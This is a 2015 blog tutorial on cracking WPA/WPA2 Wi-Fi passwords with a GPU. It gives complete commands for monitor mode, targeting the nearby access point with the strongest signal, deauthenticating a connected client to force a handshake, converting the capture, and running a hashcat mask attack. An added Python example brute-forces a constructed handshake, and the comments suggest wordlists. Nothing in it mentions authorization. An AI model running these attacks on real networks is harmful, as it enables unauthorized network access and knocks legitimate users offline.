Use GPU to Speed Up WPA/WPA2 Password Cracking

August 27, 2015


There are many ways to recover a WPA/WPA2 pre-shared key from a captured handshake. A GPU (Graphics Processing Unit) runs the PBKDF2-HMAC-SHA1 computation behind WPA/WPA2-PSK (4096 iterations per candidate passphrase) across thousands of cores in parallel, so it tests candidates many times faster than a CPU. This guide uses that GPU power to speed up WPA/WPA2 cracking.

The tools used (both available for Windows and Linux):

  1. Aircrack-ng
  2. oclHashcat (the GPU build of Hashcat; since Hashcat 3.00 the CPU and GPU builds are merged into a single hashcat binary, so on current systems substitute hashcat for oclhashcat in the commands below)

This guide assumes the following things:

  • wlan0 is a Wi-Fi interface
  • mon0 is the interface in monitor mode
  • <channel> refers to the channel the target Wi-Fi is operating on
  • 00:2d:37:4b:e4:d5 is the MAC address of the target AP (access point) (not real)
  • cc:cc:4e:5b:d7:3d is the MAC of a client associated with the target AP (not real)
  • # (hash symbol) marks the start of a command

 

Steps:

Open up a terminal

Start by putting Wi-Fi interface in monitor mode

#airmon-ng start wlan0

This puts the Wi-Fi card in monitor mode and creates a new interface, mon0, for sniffing traffic. (Aircrack-ng 1.2 and later name the monitor interface wlan0mon instead of mon0; use whatever name airmon-ng prints in every command below.)

Then, start sniffing air for all AP’s in the area.

#airodump-ng mon0

This lists every AP in your vicinity with its BSSID, channel and signal level (PWR column). Pick the one with the strongest signal and focus on it; note its BSSID and channel, you need both in the next step.

Press Ctrl+C to stop above command and type:

#airodump-ng -c <channel> --bssid 00:2d:37:4b:e4:d5 -w captured mon0

 

This command only sniffs for one specific AP:
-c <channel> tells which channel to sniff (lock onto the AP's channel so no handshake frames are missed while hopping)
--bssid is the MAC of the AP to target
-w captured tells airodump-ng to write the capture to a file, so the handshake can be used later to recover the password (airodump-ng appends a sequence number, so the file is named captured-01.cap)
mon0 is the monitor interface

Notice the MAC address of clients shown in the terminal; we’ll need it for the next step.

 

Now, open a second terminal and type:

#aireplay-ng -0 5 -a 00:2d:37:4b:e4:d5 -c cc:cc:4e:5b:d7:3d mon0

This command de-authenticates a client from its AP so that it reconnects and performs a fresh four-way handshake while airodump-ng is listening:
-0 5 selects the deauthentication attack and sends 5 rounds of deauth frames (0 would mean unlimited)
-a is the MAC of the AP
-c is the MAC of the client connected to the AP (Note: omitting -c sends a broadcast deauth, but many clients ignore broadcast deauths, so target a specific client instead.)

mon0 is our interface. Once airodump-ng shows "WPA handshake: 00:2d:37:4b:e4:d5" in its upper-right corner, the handshake is in the capture file; stop airodump-ng with Ctrl+C. aireplay-ng exits on its own after the requested 5 rounds, but if you ran it with -0 0 you must stop it as well, otherwise it keeps deauthing the client.

Once the handshake has been written to the capture file (captured-01.cap in this example), strip everything except the beacon and handshake frames with wpaclean:

#wpaclean clean_file.cap captured-01.cap

Note the argument order: clean_file.cap is the output file and captured-01.cap is the input file (the file you captured). The cleaned file is much smaller and contains only what aircrack-ng and hashcat need.

 

Now, prepare the file for hashcat by:

#aircrack-ng clean_file.cap -J for_cat

Here, clean_file.cap is from the previous step, and for_cat is the base name of the hashcat input; aircrack-ng adds the .hccap extension automatically, producing for_cat.hccap. (The .hccap format is what oclHashcat reads. Hashcat 3.40 and later switched to .hccapx, and hashcat 6.x to the hash mode 22000 format written by hcxpcapngtool, so check your version's documentation before converting.)

 

Now, begin the cracking process by:

#oclhashcat -m 2500 -a 3 --session=my_session for_cat.hccap mymask.hcmask

Here, -m 2500 selects the WPA/WPA2 hash mode
-a 3 selects the brute-force attack mode, which takes a mask (more on masks below)
--session=my_session names the session so it can be resumed later with --session=my_session --restore (WPA cracking takes a very long time)
for_cat.hccap is the path to the captured, cleaned and converted handshake file
mymask.hcmask is the path to the mask file (one mask per line)

Once a password is found it is written to the .pot file (oclHashcat.pot, located in /usr/share/oclhashcat/ on Kali). Current hashcat builds write ~/.hashcat/hashcat.potfile instead, and running hashcat --show against the same hash file prints the cracked entries.

 

NOTES ON HASHCAT MASKS

The mask uses the following placeholders, one per character position:

  • ?u for upper case letters (A-Z, 26 characters)
  • ?l for lower case letters (a-z, 26 characters)
  • ?d for digits (0-9, 10 characters)
  • ?s for the 33 printable ASCII symbols (space and punctuation)
  • ?a for all of the above (95 characters)

Any other character in the mask is taken literally, so a mask can fix a known prefix or suffix. To use a mask, type it into a plain text file (one mask per line) and pass that file as the .hcmask argument, for example:

  • ?d?d?d?d?d?d?d?d for an 8 digit password (10^8 candidates)

Keep the keyspace in mind: eight digits is 10^8 candidates, which a single GPU finishes quickly, but eight ?a positions is 95^8, about 6.6 x 10^15 candidates, which is out of reach at WPA speeds. WPA/WPA2 passphrases are 8 to 63 characters long, so masks shorter than 8 positions only produce candidates the target cannot have.
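To make concrete what the -m 2500 mode actually computes for each candidate, and how a mask expands into candidates, here is an added example (not from the original article and not hashcat's or aircrack-ng's code) that derives the PMK, PTK and MIC the way WPA2-PSK does and runs a mask against a constructed four-way handshake. The SSID, nonces and EAPOL frame are constructed for the demo, the MAC addresses are the fake ones from the assumptions above, and all function names are the example's own.

```python
import hashlib
import hmac
import itertools

# hashcat mask charsets; ?a is the union of ?l, ?u, ?d and ?s (95 printable ASCII characters)
CHARSETS = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]


def parse_mask(mask):
    """Split a mask such as 'pass?d?d?d?d' into one charset per position.
    '?x' selects a built-in charset, '??' is a literal '?', anything else is literal."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i] != "?":
            positions.append(mask[i])
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        sel = mask[i + 1]
        if sel == "?":
            positions.append("?")
        elif sel in CHARSETS:
            positions.append(CHARSETS[sel])
        else:
            raise ValueError("unknown charset ?%s" % sel)
        i += 2
    return positions


def mask_keyspace(mask):
    """Number of candidates the mask expands to (what hashcat reports as the keyspace)."""
    n = 1
    for charset in parse_mask(mask):
        n *= len(charset)
    return n


def candidates(mask):
    """Yield every candidate passphrase the mask describes, in lexicographic order."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    These 4096 iterations are the per-guess cost that the GPU parallelises."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    PRF-n concatenates HMAC-SHA1(PMK, label || 0x00 || data || counter) blocks."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out, counter = b"", 0
    while len(out) < 48:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:48]


def wpa2_mic(kck, eapol_zeroed):
    """WPA2 (key descriptor version 2, AES-CCMP): MIC = HMAC-SHA1(KCK, EAPOL frame with its
    MIC field zeroed)[:16]. KCK is the first 16 bytes of the PTK. (WPA1/TKIP uses HMAC-MD5.)"""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_zeroed(snonce):
    """Constructed EAPOL-Key frame (message 2 of the handshake) with the MIC field zeroed,
    which is the form the MIC is computed over. Layout follows the 802.11i key descriptor."""
    body = (b"\x02"                # descriptor type: RSN (WPA2)
            + b"\x01\x0a"          # key information: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x10"          # key length 16
            + b"\x00" * 8          # replay counter
            + snonce               # key nonce (SNonce in message 2)
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, key RSC, key ID
            + b"\x00" * 16         # key MIC, zeroed
            + b"\x00\x00")         # key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X header: version 2, type 3 (Key)


def make_handshake(passphrase):
    """Constructed handshake whose MIC was produced with the given passphrase (demo data only;
    SSID and nonces are made up, MACs are the fake ones from the guide)."""
    ssid, anonce, snonce = "TestNet", bytes(range(32)), bytes(range(32, 64))
    ap_mac, sta_mac = bytes.fromhex("002d374be4d5"), bytes.fromhex("cccc4e5bd73d")
    eapol_zeroed = build_eapol_zeroed(snonce)
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol_zeroed": eapol_zeroed, "mic": wpa2_mic(kck, eapol_zeroed)}


def crack(hs, mask):
    """Mask attack: derive PMK -> PTK -> MIC for each candidate and compare against the capture.
    Candidates outside the 8..63 character WPA passphrase range are skipped, as hashcat rejects them."""
    for pw in candidates(mask):
        if not 8 <= len(pw) <= 63:
            continue
        kck = wpa_ptk(wpa_pmk(pw, hs["ssid"]), hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(wpa2_mic(kck, hs["eapol_zeroed"]), hs["mic"]):
            return pw
    return None


if __name__ == "__main__":
    hs = make_handshake("pass0123")
    print("keyspace of ?d?d?d?d?d?d?d?d:", mask_keyspace("?d?d?d?d?d?d?d?d"))
    print("recovered:", crack(hs, "pass?d?d?d?d"))
```

Every candidate costs one PBKDF2 run of 4096 HMAC-SHA1 iterations (twice, since the PMK is 32 bytes) plus a handful of HMACs for the PTK and MIC, which is why the rate in hashes per second for mode 2500 is so much lower than for plain SHA1, and why a mask that keeps the keyspace small matters more here than in most other modes.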

 

That’s it for this tutorial. Honorable mention goes to blackMORE Ops.

19 Comments
  1. It's now just Hashcat (oclHashcat has been deprecated)
    I’ve gotten a LOT of success just using phone numbers and rockyou.txt.

    WPA is kinda a slow hash to crack, so good rule sets are your best friend here along with a good dictionary.
    Straight up BF’ing is not worthwhile without a GPU farm.
    Most people do not use long hard to type WiFi passwords.

    Now, any chance on a WPA-Enterprise tut?

  2. Sure, the video will be of more help.
